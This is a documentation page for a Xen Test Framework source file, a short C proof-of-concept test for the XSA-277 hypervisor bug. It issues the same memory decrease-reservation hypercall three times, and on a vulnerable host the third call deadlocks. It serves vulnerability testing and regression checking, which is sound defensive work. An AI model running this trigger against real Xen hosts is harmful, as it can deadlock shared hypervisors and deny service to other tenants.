Xen Test Framework
tests
xsa-277
main.c
Go to the documentation of this file.
1
22
#include <xtf.h>
23
24
const
char
test_title
[] =
"XSA-277 PoC"
;
25
26
static
uint8_t
balloon
[
PAGE_SIZE
]
__page_aligned_bss
;
27
28
void
test_main
(
void
)
29
{
30
unsigned
long
extents[] = {
31
virt_to_gfn
(
balloon
),
32
};
33
struct
xen_memory_reservation
mr = {
34
.
extent_start
= extents,
35
.nr_extents =
ARRAY_SIZE
(extents),
36
.domid =
DOMID_SELF
,
37
};
38
39
/* Balloon out once. Should succeed. */
40
if
(
hypercall_memory_op
(
XENMEM_decrease_reservation
, &mr) != 1 )
41
return
xtf_error
(
"Error trying to balloon out gfn %lx\n"
, extents[0]);
42
43
/*
44
* Balloon out twice. Should fail, but when vulnerable to XSA-277, the
45
* hypercall will leave the p2m lock held.
46
*/
47
if
(
hypercall_memory_op
(
XENMEM_decrease_reservation
, &mr) != 0 )
48
return
xtf_failure
(
"Fail: Probably vulnerable to XSA-277\n"
);
49
50
/* Balloon out thrice. If vulnerable, will deadlock. */
51
if
(
hypercall_memory_op
(
XENMEM_decrease_reservation
, &mr) != 0 )
52
return
xtf_failure
(
"Fail: Probably vulnerable to XSA-277\n"
);
53
54
xtf_success
(
"Success: Not vulnerable to XSA-277\n"
);
55
}
56
57
/*
58
* Local variables:
59
* mode: C
60
* c-file-style: "BSD"
61
* c-basic-offset: 4
62
* tab-width: 4
63
* indent-tabs-mode: nil
64
* End:
65
*/
__page_aligned_bss
#define __page_aligned_bss
Definition:
compiler.h:37
test_main
void test_main(void)
To be implemented by each test, as its entry point.
Definition:
main.c:110
test_title
const char test_title[]
The title of the test.
Definition:
main.c:24
hypercall_memory_op
static long hypercall_memory_op(unsigned int cmd, void *arg)
Definition:
hypercall.h:100
ARRAY_SIZE
#define ARRAY_SIZE(a)
Definition:
lib.h:8
XENMEM_decrease_reservation
#define XENMEM_decrease_reservation
Definition:
memory.h:9
virt_to_gfn
static unsigned long virt_to_gfn(const void *va)
Definition:
mm.h:100
PAGE_SIZE
#define PAGE_SIZE
Definition:
page.h:11
xtf_failure
void xtf_failure(const char *fmt,...)
Report a test failure.
Definition:
report.c:94
xtf_error
void xtf_error(const char *fmt,...)
Report a test error.
Definition:
report.c:80
xtf_success
void xtf_success(const char *fmt,...)
Report test success.
Definition:
report.c:38
uint8_t
__UINT8_TYPE__ uint8_t
Definition:
stdint.h:14
xen_memory_reservation
Definition:
memory.h:12
xen_memory_reservation::extent_start
unsigned long * extent_start
Definition:
memory.h:13
DOMID_SELF
#define DOMID_SELF
Definition:
xen.h:70
balloon
static uint8_t balloon[PAGE_SIZE]
Definition:
main.c:26
Generated by
1.9.4
